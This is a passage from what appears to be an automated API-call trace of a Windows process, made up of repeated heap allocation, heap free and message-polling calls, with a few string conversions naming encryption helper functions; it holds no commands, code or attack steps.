hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.544] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0129.544] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0129.544] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0129.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0129.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7203) returned 0x49aa010 [0129.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0129.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0129.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7203) returned 0x49b8430 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0129.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.547] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0129.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0129.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0129.547] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0129.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0129.548] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0129.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0129.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0129.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.548] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0129.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0129.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.549] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0129.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0129.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.550] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0129.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392458 [0129.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392458 | out: hHeap=0x1780000) returned 1 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0129.551] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0129.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0129.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0129.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0129.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0129.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 